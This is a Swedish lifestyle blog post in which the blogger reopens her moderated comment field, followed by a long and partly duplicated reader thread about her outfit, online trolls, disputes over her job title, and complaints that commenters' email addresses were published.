Varsegod att använd kommentarfältet, som du själv önskar =)

 

Inlägget innehåller reklamlänk. Foto: Linda Brolin 

 

C92A7546

 

Klänning HÄR  Väska Gucci Skor HÄR 

 

Hej fina!

Alltså det här med mitt kommentarsfält. Lite bakgrund är att jag stängde ner fältet helt från komentarer i samband med en väninnas tragedi. Därefter har jag haft det låst, med vissa ”filter” och man har fått invänta granskning av sin kommentar.

För och nackdelar med allt.

Jag har försökt få bort de troll och det näthat som jag i perioder utsatts för. Nackdelen är ju att måna av er som läser både min och andras bloggar kommunicerar med varandra genom våra kommentarsfält. När ni inväntar granskning från mig eller admin så kan det ta dit. och oftast kommer flera kommentarer in samtidigt, inte alltid i aktuell tid. Så då minskar såklart intresset från eran sida…. 

Konsekvensen av att jag haft det stängt i så många år är att aktiviteten här inne bland kommentarerna minskar. Vilket jag tycker är synd. Det kommer att ta tid innan det kommer igång igen. Det jag vill att du som läser här inne ska kunna göra. Det är både såklart att kommunicera direkt med mig =) Men även med varandra. briefa eventuella intressen.

Jag vill att du som läser min blogg även sk kunna be mina läsare om tips och råd. Tex semestertips på väskusten. Eller recept. Eller någon husmorskur om man drabbats av en ihärdig förkylning. Egentligen så vill jag att du som läser ska kunna skriva vad som helst, som faller just dig in!

-Hur ska vi ändra på detta? Har du några förslag eller önskemål? =) 

Jag uppmanar nu er alla till att bli mer aktiva bland kommentarerna igen =)

Jag har tagit bort granskningen och även vissa filter. Så varsågod, skriv vad du vill, om vad som helst!

Det här är alltså ett inlägg där det är fritt fram att kommentera om vad du vill, när du vill, hur du vill, på vilket sätt du vill, sålänge vi behandlar varandra med respekt och medkänsla =) 

C92A7531

Kram kram

/ My Martens

109 Komentarer

 1. Underbar klänning!! Synd att den är lite för dyr för min plånbok ? passar jättefint till ditt blonda hår! ?? Och utan att va alltför sliskig men wow vilka vader! ?

 2. Det är bra med öppet kommentarsfält men mycket av det som vissa frågar om kan man ju lika enkelt googla om.
  Men självklart är det inte fel att kunna ställa frågor och diskutera vissa saker.
  Jag personligen kommer nog fortsätta kommentera INLÄGGEN eller som nu, om man reagerar på nåt som skrivits.
  Skulle man fråga nåt och folk vill svara är det bara jobbigt gå tillbaka till där man skrev och söka svar.
  Men FÅR man fråga en sak, ”tjänar” du nåt på att vi kommenterar eller hur många kommentarer du får ? I pengar, sponsorer osv?
  Det angår oss väl kanske inte men du svarar om du vill!
  Jag är inte så insatt i sånt här.

  • Hej! Nej, man tjänar inte pengar, eller någon statistik eller så på att ni kommenterar här inne =) Men många är ganska ensamma där ute och uppskattar den gemenskap man hittar hos oss bloggare.
   Där är vi inte än, här inne. Men det är dit jag vill att man kommer. Många använder sig av ”alias” eller smeknamn här inne på webben. Andra använder sitt egna. Men många cyber-vänner hittar en relation till varandra vilket skapar en härlig stämning =) Det gemensamma intresset (mer eller mindre) är ju ändå att läsa på våra bloggar, därifrån kan man enkelt kommunicera med människor från hela landet =)
   Jag hade mycket av en typen av kommunikation, innan jag låste mitt kommentarsfält. Men det var nödvändigt, där och då.
   Sen att man kommenterar inläggen, som dus skriver. Det är självklart välkommet och uppskattat =) Men det är två skilda saker…. Hoppas du fick svar på dina frågor =)

 3. När hade du öppet kommentarsfält senast? så länge jag har läst här. Tycker själv mest att det blir försvarstal och påhopp mellan de som skriver, diskussioner vänliga sådana är väldigt sällsynta tycker jag.
  Vad hände förrrsten med din Sthlms fotograf som du hade tidigare? han var verkligen duktig.

  • Herman jobbar jag fortfarande med =) han är på europa turen denna årstid =) Det är synd att det blivit så… det är just därför jag vill ändra på det. Kommentarsfältet har varit stängt för granskning sedan höst 2014. Öppet sedan en kortare perioden. Det kommer ta ett tag, men jag ska få tillbaka den goda stämningen. Genom att ignorera troll och haters och fokusera mer på alla andra =)

 4. Underbar klänning!! Synd att den är lite för dyr för min plånbok 🙁 passar jättefint till ditt blonda hår! 👌🏼 Och utan att va alltför sliskig men wow vilka vader! 😊

 5. Jag har alltid tyckt din blogg är trevlig, jag har även köpt kläder från Ester på Öland men önskar bättre erbjudande från dem, jag förstår konkurrensen men jag som kund vill ha lite guld, varför inte erbjuda n
  R jag klickat ex en byxdress en snygg thishirt/linne som passar.
  Jag har köpt en byxdress som jag avgudar så skön, så snygg min absoluta bästa dress

 6. Nu vart det hackat mitt inlägg
  Byxdress en jag köpt är ursnygga och till bra pris, varför inte innan rea sälja på bloggen till bättre pris…. Jag har sett andra kläder jag vill också köpa
  Esterh har så mycket bra kläder och till bra pris

 7. Det är bra med öppet kommentarsfält men mycket av det som vissa frågar om kan man ju lika enkelt googla om.
  Men självklart är det inte fel att kunna ställa frågor och diskutera vissa saker.
  Jag personligen kommer nog fortsätta kommentera INLÄGGEN eller som nu, om man reagerar på nåt som skrivits.
  Skulle man fråga nåt och folk vill svara är det bara jobbigt gå tillbaka till där man skrev och söka svar.
  Men FÅR man fråga en sak, ”tjänar” du nåt på att vi kommenterar eller hur många kommentarer du får ? I pengar, sponsorer osv?
  Det angår oss väl kanske inte men du svarar om du vill!
  Jag är inte så insatt i sånt här.

  • Hej! Nej, man tjänar inte pengar, eller någon statistik eller så på att ni kommenterar här inne =) Men många är ganska ensamma där ute och uppskattar den gemenskap man hittar hos oss bloggare.
   Där är vi inte än, här inne. Men det är dit jag vill att man kommer. Många använder sig av ”alias” eller smeknamn här inne på webben. Andra använder sitt egna. Men många cyber-vänner hittar en relation till varandra vilket skapar en härlig stämning =) Det gemensamma intresset (mer eller mindre) är ju ändå att läsa på våra bloggar, därifrån kan man enkelt kommunicera med människor från hela landet =)

   Jag hade mycket av en typen av kommunikation, innan jag låste mitt kommentarsfält. Men det var nödvändigt, där och då.

   Sen att man kommenterar inläggen, som dus skriver. Det är självklart välkommet och uppskattat =) Men det är två skilda saker…. Hoppas du fick svar på dina frågor =)

  • Det gör jag inte med mina läsare. Det gör jag med troll som hotar, trakasserar eller förtalar. Inga andra =) Några är även polisanmälda . Det är totalt 3 troll som ja hängt ut….. och det står jag för!

    • Jadu, det har jag undrar också.
     Hon har iaf vid två ( som jag sett)lagt ut min Mail istället för mitt alias.
     Min Mail ÄR min privata ( och väldigt privat av olika orsaker )
     Men jag vet i alla fall med mig att jag inte skrivit nåt som behöver anmälas.
     Men ska nu My ha sitt kommentarsfält öppet så får hon nog dels lära sig att folk kan komma att skriva vad som helst och dels att hon inte behöver svara på alla kommentarer.
     Samt att det är långt från att ha en åsikt till att vara elak.
     Nåt ALLA borde tänka på.

     • Om den är privat så är det inte den du borde lägga upp, för i samma stund som du lägger upp den så offentliggör du den.
      Det är många fler än jag som ser allas mailadress. så ett tips från mig till dig är att skriva x@mail.se Så behöver du inte dela med dig av din egna dress =)
      Nu har vi skrivit om det tidigare, och jag uppskattar att din ton och dina kommentarer har förbättrats efter detta. Även om vi inte tycker lika, och du gärna delar med dig av dina åsikter här inne…. så gör du det det med en bättre ton. Du är inte en av dom som anmälts, det stämmer bra det =)

     • Nu förstår jag inte, menar du då att folk ska skriva en fejk mailadress istället för den riktiga? mailadressen står ju klart och tydligt att den inte publiceras;
      E-postadressen publiceras inte. Obligatoriska fält är märkta *
      Mailadress och ip nummer får inte publiceras och definitivt inte efter den 25 maj det kan anmälas till Datainspektionen.

     • Ja, men om man vill ha en privat mail som man inte delar med sig av så är det bättre att göra så =) Både jag, admin och alla andra med tillgång till bloggen från portalen kan ju se det =) Det är en * vid markeringen…… Läs det finstilta =) Bara i välmening, och majoriteten använder just bluff-mail som avsändare redan… oss spelar det ingen roll… =)

     • Att ni som jobbar med bloggen kan se den är väl helt ok och självklart i mina ögon men vi andra har ju definitivt inte med det att göra, det är ju då det blir helt fel.

     • Jag har också fått min mail uthängd! Det är min riktiga mail och kändes oerhört kränkande!! Jag är inget troll, har aldrig skrivit hatiskt eller hotfull. Jag har diskuterat med My och andra läsare och ifrågasatt ett inlägg (NaturalCykles). Jag vågar inte skriva med mitt egna namn eller riktiga mailadress igen.

 8. När hade du öppet kommentarsfält senast? så länge jag har läst här. Tycker själv mest att det blir försvarstal och påhopp mellan de som skriver, diskussioner vänliga sådana är väldigt sällsynta tycker jag.
  Vad hände förrrsten med din Sthlms fotograf som du hade tidigare? han var verkligen duktig.

  • Herman jobbar jag fortfarande med =) han är på europa turen denna årstid =) Det är synd att det blivit så… det är just därför jag vill ändra på det. Kommentarsfältet har varit stängt för granskning sedan höst 2014. Öppet sedan en kortare perioden. Det kommer ta ett tag, men jag ska få tillbaka den goda stämningen. Genom att ignorera troll och haters och fokusera mer på alla andra =)

 9. Nu hänger jag inte alls med, har du haft kommentarerna stängda i flera år?? Jag har ju kommenterat flera gånger ?
  Men du fina, jag blir så arg att det finns de som håller på att skriva skit till dig när du verkar vara en såååån fin människa. Vad har du gjort liksom. Men det är just det som är grejen, det är inget man själv gjort, det är bara idioter som mår bajs och måste skita ner andra med det.
  Du är värd allt det fina, så se alla de fina kommentarerna bara ?
  Kram fina, vad fin du var i klänningen förresten. <3

  • Diana? Varför kallar du dig admin? =) Ja, det har varit stäng, för granskning och med filter sedan hösten 2014. Tack snälla fina du ? Kram kram / My Martens

 10. Om du tror att du skrämmer folk med att du minsann ”stämt 3 pers”, så tror du fel.
  My: du måste bli mer profesionell, sluta med att skälla på folk i din blogg, ”skrika” åt dom, etc.
  skaffa rättstavningsprogram å det snaraste, för din egen skull, så att det ser mer proffsigt ut liksom…
  Jag menar: du har ju blivit VD! (enligt dig själv)
  Då kan man inte sitta och gasta som en rasande furie..
  Du måste lära dig ordet- distans.
  Låt det rinna av, som vattnet på en gås liksom…
  Så gör Blondinbella jue.. hmm! Bara ibland!Kan hon så kan väl du?
  Men du kanske har låst dig
  inne i ditt huvud

  • Det spelar väl ingen roll om man är VD eller något annat, om inte folk har vett när de skriver så tycker jag att My gör helt rätt som ”skäller”.

   • Hahaha, kära nån, hon är ingen VD såsom du tänker dig den rollen, hon kanske i verkligheten har ansvar för ETT(1) papper, med typ några få anställda. Om du visste hur många ”hittepåjobb” det finns i STHLM idag, du skulle baxna!
    Så länge My inte vågar redovisa alla sina arbetsuppgifter öppet, så tror jag vad jag tror.
    Snälla, höj henne inte till skyarna, hon blåser er !

    • Du uttrycker dig så öppenhjärtligt och rättframt I, jag tror att du med bästa intentioner visar ditt goda omdöme inför just att vara sig själv, och framöver identifierar dig i all välvilja för att vara den bästa av exempel! Du är så välkommen !

  • Stämt 3 personer? Det har jag inte gjort, eller heller sagt att jag gjort?
   Dom polisanmälningarna jag gjort har varit nödvändiga, av säkerhetsmässiga själ.
   Jag är VD, och älskar mitt jobb. Det är både roligt, intensivt, och en utmaning. Jag älskar utmaningar!
   Genom dina kommentarer ovan försöker du att kritisera det? Innan detta jobbet var jag VD i 11 år. Ett jobb med mycket ansvar är inget nytt för mig. Att jobba mot budget, med strategier, försäljning, marknadsföring, 360 lösningar och personal är inte heller nytt för mig. Jag har skrivit öppet om vad mina uppgifter är, det och lite till… Jag lägger in länken igen.
   Här skrev jag när mitt jobb äntligen blev officiellt
   https://blogg.alltforforaldrar.se/mammamy/2018/05/21/mitt-nya-jobb-vd-for-lifestyle-comminication/
   Här beskrev jag mer vad jag gör
   https://blogg.alltforforaldrar.se/mammamy/2018/05/22/vad-ar-egentligen-lifestyle/
   Du skriver om ”hittepå” jobb och att jag blåser er.
   Det är ju rent förtal???
   Men lugn, ingen anmälan görs här. Du utgör inget hot, eller är ett troll som utsätter mig eller min familj för fara. Vilket varit grunden för de tre polisanmälningarna som jag tvingats göra under alla mina år som bloggare.
   Däremot så förstår jag inte varför du ”j” stannar kvar här inne för att endast sprida negativitet här inne? Du kan enkelt slippa mig, mina fletsavde inlägg och allt annat som du stör dig på, genom att helt enkelt bara sluta följa mig och läsa min blogg.
   Vad du tycker och tänker om mig och mitt jobb. Det är helt upp till dig, och ingenting jag bryr mig om. Men hur mina andra läsare ska behöva läsa dina återupprepade negativa kommentarer det begriper jag helt enkelt inte…..
   vad det gäller mina både felstavningar och särskrivningar så låter jag det vara så.Det finns inger rättstavningsprogram som hindrar att man kastar om orden eller särskriver. Autokorr kan dessutom göra galet roliga fleskrivningar.
   Jag har dyslexi. jag vill ge hopp till alla dom som lever med samma sjukdom som jag själv. Iblnad vänder och vrider jag på både meningar och ord. Jag särskriver och sparar enormt. Men wow! vilken utveckling, Bloggen har hjälpt mig enomt mycket me min stavning. Jämför du mina inlägg idag med dom jag börjad emin bloggkarriär med 2013 så är det stora framsteg.
   Jag har varit egen förtager och VD sedan 18 års ålder. Jag har alltid haft en anställd som korrat mina annonstexter eller intervjuer som har gjorts.
   När jag började skriva för träningsmagasinet Hälsa och Fitness, så korrar alltid redaktörer eller journalisten allt som ska gå in i magasinet eller som webb-artiklar.
   Samma sak är det på min redaktion på Lifestyle. Vi har flera erfarna journalister som korrar alla texter. Förutom det har vi ett grymt team på layout som även dom korrar texterna. Alla gör vi det vi är bra på. jag är bra på att förmedla och skriva personliga texter, men kass på stavning. Det är bara så det är…. Thats me =)

    • Tack och hej ”j” Yvonne! Nu har jag försökt att svara dig på dina frågor flera gånger. I olika inlägg och på olika kommentarer Men du blir ju bara värre och värre för varje gång jag försöker att bemöta dig =) Jag gör detta för att visa dig respekt. Inte för att ändra din åsikt eller få dig att tycka om mig. Men nu får det vara nog. Från och med nu så får du ingen direkt kontakt med mig längre…. Gör dig själ en tjänst och lämna både mig och bloggen bakom dig. Hitta istället forum där du blir glad, positivt och får energi ifrån =) -stor lycka till!

 11. Jag har alltid tyckt din blogg är trevlig, jag har även köpt kläder från Ester på Öland men önskar bättre erbjudande från dem, jag förstår konkurrensen men jag som kund vill ha lite guld, varför inte erbjuda n
  R jag klickat ex en byxdress en snygg thishirt/linne som passar.
  Jag har köpt en byxdress som jag avgudar så skön, så snygg min absoluta bästa dress

 12. Nu vart det hackat mitt inlägg
  Byxdress en jag köpt är ursnygga och till bra pris, varför inte innan rea sälja på bloggen till bättre pris…. Jag har sett andra kläder jag vill också köpa
  Esterh har så mycket bra kläder och till bra pris

  • Det gör jag inte med mina läsare. Det gör jag med troll som hotar, trakasserar eller förtalar. Inga andra =) Några är även polisanmälda . Det är totalt 3 troll som ja hängt ut….. och det står jag för!

    • Jadu, det har jag undrar också.
     Hon har iaf vid två ( som jag sett)lagt ut min Mail istället för mitt alias.
     Min Mail ÄR min privata ( och väldigt privat av olika orsaker )
     Men jag vet i alla fall med mig att jag inte skrivit nåt som behöver anmälas.
     Men ska nu My ha sitt kommentarsfält öppet så får hon nog dels lära sig att folk kan komma att skriva vad som helst och dels att hon inte behöver svara på alla kommentarer.
     Samt att det är långt från att ha en åsikt till att vara elak.
     Nåt ALLA borde tänka på.

     • Om den är privat så är det inte den du borde lägga upp, för i samma stund som du lägger upp den så offentliggör du den.
      Det är många fler än jag som ser allas mailadress. så ett tips från mig till dig är att skriva x@mail.se Så behöver du inte dela med dig av din egna dress =)

      Nu har vi skrivit om det tidigare, och jag uppskattar att din ton och dina kommentarer har förbättrats efter detta. Även om vi inte tycker lika, och du gärna delar med dig av dina åsikter här inne…. så gör du det det med en bättre ton. Du är inte en av dom som anmälts, det stämmer bra det =)

     • Nu förstår jag inte, menar du då att folk ska skriva en fejk mailadress istället för den riktiga? mailadressen står ju klart och tydligt att den inte publiceras;

      E-postadressen publiceras inte. Obligatoriska fält är märkta *

      Mailadress och ip nummer får inte publiceras och definitivt inte efter den 25 maj det kan anmälas till Datainspektionen.

     • Ja, men om man vill ha en privat mail som man inte delar med sig av så är det bättre att göra så =) Både jag, admin och alla andra med tillgång till bloggen från portalen kan ju se det =) Det är en * vid markeringen…… Läs det finstilta =) Bara i välmening, och majoriteten använder just bluff-mail som avsändare redan… oss spelar det ingen roll… =)

     • Att ni som jobbar med bloggen kan se den är väl helt ok och självklart i mina ögon men vi andra har ju definitivt inte med det att göra, det är ju då det blir helt fel.

     • Jag har också fått min mail uthängd! Det är min riktiga mail och kändes oerhört kränkande!! Jag är inget troll, har aldrig skrivit hatiskt eller hotfull. Jag har diskuterat med My och andra läsare och ifrågasatt ett inlägg (NaturalCykles). Jag vågar inte skriva med mitt egna namn eller riktiga mailadress igen.

 13. Nu hänger jag inte alls med, har du haft kommentarerna stängda i flera år?? Jag har ju kommenterat flera gånger 🙂

  Men du fina, jag blir så arg att det finns de som håller på att skriva skit till dig när du verkar vara en såååån fin människa. Vad har du gjort liksom. Men det är just det som är grejen, det är inget man själv gjort, det är bara idioter som mår bajs och måste skita ner andra med det.

  Du är värd allt det fina, så se alla de fina kommentarerna bara 😀
  Kram fina, vad fin du var i klänningen förresten. <3

  • Diana? Varför kallar du dig admin? =) Ja, det har varit stäng, för granskning och med filter sedan hösten 2014. Tack snälla fina du 😀 Kram kram / My Martens

 14. Om du tror att du skrämmer folk med att du minsann ”stämt 3 pers”, så tror du fel.
  My: du måste bli mer profesionell, sluta med att skälla på folk i din blogg, ”skrika” åt dom, etc.
  skaffa rättstavningsprogram å det snaraste, för din egen skull, så att det ser mer proffsigt ut liksom…
  Jag menar: du har ju blivit VD! (enligt dig själv)
  Då kan man inte sitta och gasta som en rasande furie..
  Du måste lära dig ordet- distans.
  Låt det rinna av, som vattnet på en gås liksom…
  Så gör Blondinbella jue.. hmm! Bara ibland!Kan hon så kan väl du?
  Men du kanske har låst dig
  inne i ditt huvud

  • Det spelar väl ingen roll om man är VD eller något annat, om inte folk har vett när de skriver så tycker jag att My gör helt rätt som ”skäller”.

   • Hahaha, kära nån, hon är ingen VD såsom du tänker dig den rollen, hon kanske i verkligheten har ansvar för ETT(1) papper, med typ några få anställda. Om du visste hur många ”hittepåjobb” det finns i STHLM idag, du skulle baxna!
    Så länge My inte vågar redovisa alla sina arbetsuppgifter öppet, så tror jag vad jag tror.
    Snälla, höj henne inte till skyarna, hon blåser er !

    • Du uttrycker dig så öppenhjärtligt och rättframt I, jag tror att du med bästa intentioner visar ditt goda omdöme inför just att vara sig själv, och framöver identifierar dig i all välvilja för att vara den bästa av exempel! Du är så välkommen !

  • Stämt 3 personer? Det har jag inte gjort, eller heller sagt att jag gjort?
   Dom polisanmälningarna jag gjort har varit nödvändiga, av säkerhetsmässiga själ.

   Jag är VD, och älskar mitt jobb. Det är både roligt, intensivt, och en utmaning. Jag älskar utmaningar!

   Genom dina kommentarer ovan försöker du att kritisera det? Innan detta jobbet var jag VD i 11 år. Ett jobb med mycket ansvar är inget nytt för mig. Att jobba mot budget, med strategier, försäljning, marknadsföring, 360 lösningar och personal är inte heller nytt för mig. Jag har skrivit öppet om vad mina uppgifter är, det och lite till… Jag lägger in länken igen.

   Här skrev jag när mitt jobb äntligen blev officiellt

   https://blogg.alltforforaldrar.se/mammamy/2018/05/21/mitt-nya-jobb-vd-for-lifestyle-comminication/

   Här beskrev jag mer vad jag gör

   https://blogg.alltforforaldrar.se/mammamy/2018/05/22/vad-ar-egentligen-lifestyle/

   Du skriver om ”hittepå” jobb och att jag blåser er.

   Det är ju rent förtal???

   Men lugn, ingen anmälan görs här. Du utgör inget hot, eller är ett troll som utsätter mig eller min familj för fara. Vilket varit grunden för de tre polisanmälningarna som jag tvingats göra under alla mina år som bloggare.

   Däremot så förstår jag inte varför du ”j” stannar kvar här inne för att endast sprida negativitet här inne? Du kan enkelt slippa mig, mina fletsavde inlägg och allt annat som du stör dig på, genom att helt enkelt bara sluta följa mig och läsa min blogg.

   Vad du tycker och tänker om mig och mitt jobb. Det är helt upp till dig, och ingenting jag bryr mig om. Men hur mina andra läsare ska behöva läsa dina återupprepade negativa kommentarer det begriper jag helt enkelt inte…..

   vad det gäller mina både felstavningar och särskrivningar så låter jag det vara så.Det finns inger rättstavningsprogram som hindrar att man kastar om orden eller särskriver. Autokorr kan dessutom göra galet roliga fleskrivningar.

   Jag har dyslexi. jag vill ge hopp till alla dom som lever med samma sjukdom som jag själv. Iblnad vänder och vrider jag på både meningar och ord. Jag särskriver och sparar enormt. Men wow! vilken utveckling, Bloggen har hjälpt mig enomt mycket me min stavning. Jämför du mina inlägg idag med dom jag börjad emin bloggkarriär med 2013 så är det stora framsteg.

   Jag har varit egen förtager och VD sedan 18 års ålder. Jag har alltid haft en anställd som korrat mina annonstexter eller intervjuer som har gjorts.

   När jag började skriva för träningsmagasinet Hälsa och Fitness, så korrar alltid redaktörer eller journalisten allt som ska gå in i magasinet eller som webb-artiklar.

   Samma sak är det på min redaktion på Lifestyle. Vi har flera erfarna journalister som korrar alla texter. Förutom det har vi ett grymt team på layout som även dom korrar texterna. Alla gör vi det vi är bra på. jag är bra på att förmedla och skriva personliga texter, men kass på stavning. Det är bara så det är…. Thats me =)

    • Tack och hej ”j” Yvonne! Nu har jag försökt att svara dig på dina frågor flera gånger. I olika inlägg och på olika kommentarer Men du blir ju bara värre och värre för varje gång jag försöker att bemöta dig =) Jag gör detta för att visa dig respekt. Inte för att ändra din åsikt eller få dig att tycka om mig. Men nu får det vara nog. Från och med nu så får du ingen direkt kontakt med mig längre…. Gör dig själ en tjänst och lämna både mig och bloggen bakom dig. Hitta istället forum där du blir glad, positivt och får energi ifrån =) -stor lycka till!

 15. Synd du svarar på elaka kommentarer. Dom vill ju synas och det gör dom när du svarar. Dom har inget bra att komma med men det struntar vi i. Fin klänning och kramis.

 16. Varför är det så svårt att läsa kommentarer med mobilen. Texten hamnar liksom utanför tex dina svar på kommentarer. Har sett att en del bilder blir så också. I fel format alltså. Det händer bara på din blogg av alla jag läser så då undrar jag om din blogg är helt mobilanpassad?

  • Hmm… konstigt! Ska kolla detta asap. Det ska vara mobilanpassat, men samma sak hände för några månader sedan. Tack för att du skriver det =) Kram

 17. Du skriver att Du har sedan Hösten 2014 har haft ett stängt kommentarsfält tills för några veckor, månader p g a en vänninas tragedi !
  LÖGN ! LÖGN! Lögner!
  Det gör så jävla ont i hjärtat att du överhuvudtaget skriver det !
  SKÄMS!
  B t w! Du är inte VD i något Bolag enligt Bolagsverket, Du är en Ledamot i ditt eget AB utan revisor. Källa Bolagsverket
  !

 18. Ja du trötter. Jag kan tänka att vissa går lite orättvist hårt åt My här inne. Att kommentera utseende och sånt kan man bespara både henne och oss.
  Dock blir jag beklämd när hon verkar fara med rena lögner över sådant som verkligen är superenkelt att kolla upp. Det gäller så väl vart man är skriven som vilka bolagsengagemang man har. För mig är det obegripligt varför man ljuger om sådana saker. Det kanske handlar om ren okunnighet – vilket det förmodligen också gör när hon tror att det är OK enligt GDPR att hänga ut enskilda IP – adresser och ibland även gissade namn.
  My: tagga ned lite ingen vill prata här inne när du alltid hugger om man ifrågasätter det minsta. Vet inte ens om jag orkar gå in på det men du får gärna kommentera varför din son inte har badkläder på sig i poolen. Räkna gärna till 11 innan du skriver.
  Tack!

  • Badkläder i poolen? Han ville väl bada naken helt enkelt. Har du aldrig gjort de? Det är superhärligt! Testa vetja! ?

    • Nu vet inte jag vilket år du själv var 7 år och badade =) Inte heller vilken fotoutrustnings möjlighet ni hade då.
     Men idag så har vi alla mjöliga foto alternativ och en helt annan tid med socialamedier. Mobilkamerorna har slagit igenom som en revolution =) Min son älskar att vara med på kort, och vi tittar på alla blogginlägg tillsammans flera gånger när han är med =) Detta är en portal som heter ”Allt för föräldrar”. Voire lite knasigt om det inte var barn med här inne, kan jag tycka. samma ska i alla mamma/föräldramagasin och annonser tex =)

     • Vill ju inte ”käfta” med dig. Det är inte alls min mening. Nakna barn är dock sällan man ser även i dagens bloggande. Dom flesta föräldrar värnar mer om sina barn än så. Bingo har gjort det men han är fotograf och gör det med viss finess. I övrigt kommer jag inte på någon mer än du som lägger ut nakenbilder på sina egna barn. Ditt barn är inte tillräckligt gammalt för att själv avgöra vad du väljer att visa. Bara en liten vädjan till dig att i alla fall bespara honom den här typen av uthängningar.
      I övrigt – ja du för väl bok över mina kommentarer och så så du vet väl vem jag är och vad jag tycker. (Vilket jag inte godtar så nu har vi det på pränt vid eventuell revision).
      På det stora hela – återigen – du kör en bra blogg som är kul att ta del av. All respekt för ditt kämpande.

     • Detta är en halv rumpa, snett bakifrån =) Ingen blottande helnaken pojke med könsorgan som syns. Även jag har mina gränser. Denna bilden tycker jag är härlig, den förmildra glädje, sommarlov och liv =) Även om detta är en mobilbild som är tagen av en mamma som inte är professionell fotograf =)
      Alla kommentarer sparas, och med ett klick får man upp alla kommentar från samma person. På min och alla andras bloggar fungerar detta på i stort sett samma sätt =)

    • Alltså amarulla, hur gammal är du eg? Detta var nog den mest korkade kommentaren idag måste jag säga. ” nakenbilder”? Kom igen nu va, hoppas att du bara driver med my o dig själv för annars så har du nog inte mycket där uppe i knoppen så att säga…..

 19. Synd du svarar på elaka kommentarer. Dom vill ju synas och det gör dom när du svarar. Dom har inget bra att komma med men det struntar vi i. Fin klänning och kramis.

 20. Varför är det så svårt att läsa kommentarer med mobilen. Texten hamnar liksom utanför tex dina svar på kommentarer. Har sett att en del bilder blir så också. I fel format alltså. Det händer bara på din blogg av alla jag läser så då undrar jag om din blogg är helt mobilanpassad?

  • Hmm… konstigt! Ska kolla detta asap. Det ska vara mobilanpassat, men samma sak hände för några månader sedan. Tack för att du skriver det =) Kram

 21. Du skriver att Du har sedan Hösten 2014 har haft ett stängt kommentarsfält tills för några veckor, månader p g a en vänninas tragedi !
  LÖGN ! LÖGN! Lögner!
  Det gör så jävla ont i hjärtat att du överhuvudtaget skriver det !
  SKÄMS!

  B t w! Du är inte VD i något Bolag enligt Bolagsverket, Du är en Ledamot i ditt eget AB utan revisor. Källa Bolagsverket
  !

 22. Ja du trötter. Jag kan tänka att vissa går lite orättvist hårt åt My här inne. Att kommentera utseende och sånt kan man bespara både henne och oss.

  Dock blir jag beklämd när hon verkar fara med rena lögner över sådant som verkligen är superenkelt att kolla upp. Det gäller så väl vart man är skriven som vilka bolagsengagemang man har. För mig är det obegripligt varför man ljuger om sådana saker. Det kanske handlar om ren okunnighet – vilket det förmodligen också gör när hon tror att det är OK enligt GDPR att hänga ut enskilda IP – adresser och ibland även gissade namn.

  My: tagga ned lite ingen vill prata här inne när du alltid hugger om man ifrågasätter det minsta. Vet inte ens om jag orkar gå in på det men du får gärna kommentera varför din son inte har badkläder på sig i poolen. Räkna gärna till 11 innan du skriver.

  Tack!

  • Badkläder i poolen? Han ville väl bada naken helt enkelt. Har du aldrig gjort de? Det är superhärligt! Testa vetja! 😊

    • Nu vet inte jag vilket år du själv var 7 år och badade =) Inte heller vilken fotoutrustnings möjlighet ni hade då.

     Men idag så har vi alla mjöliga foto alternativ och en helt annan tid med socialamedier. Mobilkamerorna har slagit igenom som en revolution =) Min son älskar att vara med på kort, och vi tittar på alla blogginlägg tillsammans flera gånger när han är med =) Detta är en portal som heter ”Allt för föräldrar”. Voire lite knasigt om det inte var barn med här inne, kan jag tycka. samma ska i alla mamma/föräldramagasin och annonser tex =)

     • Vill ju inte ”käfta” med dig. Det är inte alls min mening. Nakna barn är dock sällan man ser även i dagens bloggande. Dom flesta föräldrar värnar mer om sina barn än så. Bingo har gjort det men han är fotograf och gör det med viss finess. I övrigt kommer jag inte på någon mer än du som lägger ut nakenbilder på sina egna barn. Ditt barn är inte tillräckligt gammalt för att själv avgöra vad du väljer att visa. Bara en liten vädjan till dig att i alla fall bespara honom den här typen av uthängningar.

      I övrigt – ja du för väl bok över mina kommentarer och så så du vet väl vem jag är och vad jag tycker. (Vilket jag inte godtar så nu har vi det på pränt vid eventuell revision).

      På det stora hela – återigen – du kör en bra blogg som är kul att ta del av. All respekt för ditt kämpande.

     • Detta är en halv rumpa, snett bakifrån =) Ingen blottande helnaken pojke med könsorgan som syns. Även jag har mina gränser. Denna bilden tycker jag är härlig, den förmildra glädje, sommarlov och liv =) Även om detta är en mobilbild som är tagen av en mamma som inte är professionell fotograf =)

      Alla kommentarer sparas, och med ett klick får man upp alla kommentar från samma person. På min och alla andras bloggar fungerar detta på i stort sett samma sätt =)

    • Alltså amarulla, hur gammal är du eg? Detta var nog den mest korkade kommentaren idag måste jag säga. ” nakenbilder”? Kom igen nu va, hoppas att du bara driver med my o dig själv för annars så har du nog inte mycket där uppe i knoppen så att säga…..

 23. Hejsan. Följer dig & tycker du är grym med din ärliga bild om hur livet kan vara .
  Tycker du nu utstrålar harmoni & är vacker , absolut inte att du inte sett bra ut förut ,men din Jonas vekar fått dig mer harmonisk & önskar er all lycka .
  Men är lite tvärtemot undrar vart du köpt dina fina stövlar eller kängor endel sagt ser höstiga ut , älskar dom & skulle gärna ha såna själv.
  Tack för en bra ärlig blogg & önskar er 3 & era katter en jättebra & skön semester sen när den kommer ☺

  • Tack snälla Eva! Vilka ord! Ja… du har rätt. Jag har börjat hitta en annan balans, och harmoni tillsammans med Jonas. Jag jobbar aktivt med just det, men han är ett enormt stöd och en riktig klippa =)
   Vilka stövlar är det du menar? Kram kram

 24. Hejsan. Följer dig & tycker du är grym med din ärliga bild om hur livet kan vara .
  Tycker du nu utstrålar harmoni & är vacker , absolut inte att du inte sett bra ut förut ,men din Jonas vekar fått dig mer harmonisk & önskar er all lycka .
  Men är lite tvärtemot undrar vart du köpt dina fina stövlar eller kängor endel sagt ser höstiga ut , älskar dom & skulle gärna ha såna själv.
  Tack för en bra ärlig blogg & önskar er 3 & era katter en jättebra & skön semester sen när den kommer ☺

  • Tack snälla Eva! Vilka ord! Ja… du har rätt. Jag har börjat hitta en annan balans, och harmoni tillsammans med Jonas. Jag jobbar aktivt med just det, men han är ett enormt stöd och en riktig klippa =)

   Vilka stövlar är det du menar? Kram kram

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

